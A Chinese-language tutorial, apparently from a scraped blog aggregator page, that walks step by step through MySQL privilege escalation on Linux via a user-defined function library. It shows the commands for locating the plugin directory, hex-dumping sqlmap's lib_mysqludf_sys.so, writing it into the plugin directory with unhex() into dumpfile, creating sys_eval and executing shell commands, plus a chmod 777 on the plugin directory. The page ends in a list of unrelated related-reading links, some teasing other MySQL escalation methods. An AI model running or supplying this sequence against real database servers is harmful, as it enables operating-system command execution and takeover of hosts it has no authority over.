Linux利用UDF库实现Mysql提权

环境:

os:linux(bt5)

database:mysql

简述:

通过自定义库函数来实现执行任意的程序,这里只在linux下测试通过,具体到windows,所用的dll自然不同。

要求:

在mysql库下必须有func表,并且在‑‑skip‑grant‑tables开启的情况下,UDF会被禁止;

过程: 得到插件库路径 找对应操作系统的udf库文件 利用udf库文件加载函数并执行命令

1,得到插件库路径

mysql> show variables like "%plugin%";

+---------------+-----------------------+

| Variable_name | Value |

+---------------+-----------------------+

| plugin_dir | /usr/lib/mysql/plugin |

+---------------+-----------------------+

1 row in set (0.00 sec)

2,找对应操作系统的udf库文件

因为自己测试,看了下自己系统的版本,64位

root@bt:~# uname -a

Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

对于udf文件,在sqlmap工具中自带就有,只要找对应操作系统的版本即可

root@bt:/pentest/database/sqlmap/udf/mysql# ls

linux windows

root@bt:/pentest/database/sqlmap/udf/mysql/linux# ls

32 64

root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# ls

lib_mysqludf_sys.so

3,利用udf库文件加载函数并执行命令

首先要得到udf库文件的十六进制格式,可在本地通过

mysql> select hex(load_file('/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so')) into outfile '/tmp/udf.txt';

Query OK, 1 row affected (0.04 sec)

因为我测试时,使用自带账户,账户名mysql,并不是root,所以插件目录不可写,而实际中,一般udf提权都是用root权限启动的mysql程序,故,不存在目录权限不足,不能访问的情况。为了继续,修改目录权限

root@bt:~# chmod 777 /usr/lib/mysql/plugin

数据库中写入udf库到mysql库目录:

mysql> select unhex('7F454C46020...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';

Query OK, 1 row affected (0.04 sec)

查看下这个udf库所支持的函数

root@bt:~# nm -D /usr/lib/mysql/plugin/mysqludf.so

w _Jv_RegisterClasses

0000000000201788 A __bss_start

w __cxa_finalize

w __gmon_start__

0000000000201788 A _edata

0000000000201798 A _end

0000000000001178 T _fini

0000000000000ba0 T _init

U fgets

U fork

U free

U getenv

000000000000101a T lib_mysqludf_sys_info

0000000000000da4 T lib_mysqludf_sys_info_deinit

0000000000001047 T lib_mysqludf_sys_info_init

U malloc

U mmap

U pclose

U popen

U realloc

U setenv

U strcpy

U strncpy

0000000000000dac T sys_bineval

0000000000000dab T sys_bineval_deinit

0000000000000da8 T sys_bineval_init

0000000000000e46 T sys_eval

0000000000000da7 T sys_eval_deinit

0000000000000f2e T sys_eval_init

0000000000001066 T sys_exec

0000000000000da6 T sys_exec_deinit

0000000000000f57 T sys_exec_init

00000000000010f7 T sys_get

0000000000000da5 T sys_get_deinit

0000000000000fea T sys_get_init

000000000000107a T sys_set

00000000000010e8 T sys_set_deinit

0000000000000f80 T sys_set_init

U sysconf

U system

U waitpid

最后,加载函数并执行:

mysql> create function sys_eval returns string soname "mysqludf.so";

Query OK, 0 rows affected (0.14 sec)

mysql> select sys_eval('whoami');

+--------------------+

| sys_eval('whoami') |

+--------------------+

| mysql |

+--------------------+

1 row in set (0.04 sec)

mysql> select * from mysql.func;

+----------+-----+-------------+----------+

| name | ret | dl | type |

+----------+-----+-------------+----------+

| sys_eval | 0 | mysqludf.so | function |

+----------+-----+-------------+----------+

1 row in set

相关阅读:

使用js Math.random()函数生成n到m间的随机数字

js的form表单提交url传参数(包含+等特殊字符)的两种解决方法

NopCommerce架构分析之(八)多语言支持

Linux中使用cpulimit限制进程的cpu使用率

asp.net使用Socket.Send发送信息及Socket.SendFile传输文件的方法

fetchAll()与mysql_fetch_array()的区别详解

Android 动画之TranslateAnimation应用详解

Mysql使用简单教程(三)

Windows Mobile Build 10080预览版系统严重BUG被修复了

PHP 9 大缓存技术总结

Win10升级宝典:免费升级Win10的诸多问题

Less里css表达式的写法示例介绍

JavaScript中指定函数名称的相关方法

使用HTML5做个画图板的方法介绍

bt5 mysql root_MySQL_Linux利用UDF库实现Mysql提权,环境: os:linux(bt5)database - phpStudy...相关推荐

  1. MySQL提权总结与记录-UDF/MOF/启动项提权

    0x00 Mysql提权基础 Mysql提权主要是需要利用高权限的Mysql用户进行操作,拿用户主要是下列几种方式 注入 上传getshell 查看网站数据库配置信息拿到用户密码 弱口令 mysql系 ...

  2. .NET 使用 MySql.Data.dll 动态库操作MySql的帮助类--MySqlHelper

    .NET 使用 MySql.Data.dll 动态库操作MySql的帮助类--MySqlHelper 參考演示样例代码,例如以下所看到的: /// <summary>/// MySql 数 ...

  3. mysql cve 2016 3521_MySQL-based databases CVE-2016-6664 本地提权

    @date: 2016/11/10 @author: dlive 0x00 前言 这个漏洞可以结合CVE-2016-6663使用提升权限到root 0x01 漏洞原文 # http://legalha ...

  4. mysql 5 可执行漏洞_漏洞预警:MySQL 0-day代码执行漏洞 可本地提权

    来自波兰的安全研究人员Dawid Golunski刚刚发现了两个MySQL的0-day漏洞,影响到所有版本分支.默认配置的MySQL服务器(5.7.5.6和5.5),包括最新版本.攻击者可以远程和本地 ...

  5. 【MySQL】企业共享库:MySQL常见的错误代码

    145 :文件无法打开. 1005:MYSQL创建表失败 1006:MYSQL创建数据库失败 1007:MYSQL数据库已存在,创建数据库失败 1008:MYSQL数据库不存在,删除数据库失败 100 ...

  6. linux mysql数据库优化_MySQL_Linux下MySQL数据库性能调优方法,以下的环境具备一定的代表性 - phpStudy...

    Linux下MySQL数据库性能调优方法 以下的环境具备一定的代表性,可以说是中小企业一般配置和工作环境.希望通过本文能让大家理解Linux下MySQL数据库性能调优方法. 硬件准备环境: 硬盘: 1 ...

  7. 服务器管理员账号sa,一次利用MSSQL的SA账户提权获取服务器权限

    遇到小人,把服务器整走了 自己手里只有sql server的sa账号密码 模糊记起之前用这个账户提权读取文件的事 百度之,发现相关信息一堆堆 各种工具也用了不少 发现不是语法错误就是权限不够 无奈之下 ...

  8. MySQL函数及提权

    在 sql 注入时为了应对各种限制措施,利用数据库自带的一些系统函数经过各种变换之后可以绕过一些 安全设备或者一些基础防御的措施,比如一些字符串转换的函数.截取字符串长度的函数等, 应用的场景包括:通 ...

  9. MySQL提权的两种方式_利用sqlmap进行mysql提权的小方法(win与liunx通用)

    文章作者:pt007@vip.sina.com 文章来源:https://www.t00ls.net/thread-36196-1-1.html 1.连接mysql数据打开一个交互shell: sql ...

最新文章

  1. 当前标识(NT AUTHORITY\NETWORK SERVICE)没有对“的写访问权限。
  2. Android插件化(使用Small框架)
  3. ediplus 复制编辑一列_EditPlus等编辑器选中列(块)的方法
  4. 【转】测试工程师日常工作需要关注的问题
  5. mysql客户端重置密码是多少,mysql重置root密码
  6. Mine Number(搜索,暴力) ACM省赛第三届 G
  7. mpvue学习笔记-之微信数据请求封装
  8. 手披云雾开鸿蒙,描写泰山的诗句不是整首诗、注明作者
  9. Win7密码破解 忘记win7密码解决办法
  10. 苹果电脑怎么更换计算机模式,图文详解苹果电脑如何切换成windows系统
  11. java pacs上传服务_医疗pacs系统影像数据的同步方法及前置服务器的制造方法
  12. 承接上篇 Logback 打印SQL配置
  13. HCIE-RS论述题QOS
  14. 华为最新5G V2X高级使用案例曝光,未来交通是这样的!
  15. 一款功能超级强大的AI驱动自动一键抠图软件,可一键扣人物商品衣服动物婚纱图章签名logo
  16. 爱国者新品发布 智能果汁机助力双创 居家创业双赢新产能
  17. 数据库逻辑结构设计阶段的4个工作步骤-
  18. Detecting Visual Relationships with Deep Relational Networks(阅读笔记)
  19. 我在CSDN的2022:突破零粉丝,4个月涨粉4000+,2023年目标5万+
  20. Analyze提示:Value stored to ***is never read

热门文章

  1. 深度学习_GAN_GAN优化训练方法汇总(全网最全,持续更新)
  2. Eclipse JDT--ASTParser介绍
  3. SOCK_STREAM,SOCK_DGRAM,SOCK_SEQPACKET,SOCK_RAW.
  4. Android开发中的水波纹效果实现
  5. 高级架构师纯手写MySQL笔记,已经熬夜学习了
  6. android仿支付宝首页更多、应用编辑界面
  7. NodeJS —— Buffer 解读
  8. 深蓝词库转换1.9发布mdash;mdash;支持英库拼音、搜狗bin格式、FIT、中州韵等
  9. c语言中后缀字母如 d h b l i,2007年4月全国自考(微型计算机原理与接口技术)真题试卷...
  10. 力扣LeetCode刷题心得之Python 找到最接近 0 的数字